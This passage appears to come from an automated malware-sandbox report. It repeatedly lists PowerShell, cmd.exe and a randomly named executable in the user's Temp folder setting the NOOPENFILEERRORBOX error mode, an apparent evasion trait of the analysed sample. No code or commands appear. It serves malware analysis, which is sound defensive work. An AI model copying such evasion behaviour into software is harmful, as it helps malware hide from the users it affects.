Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
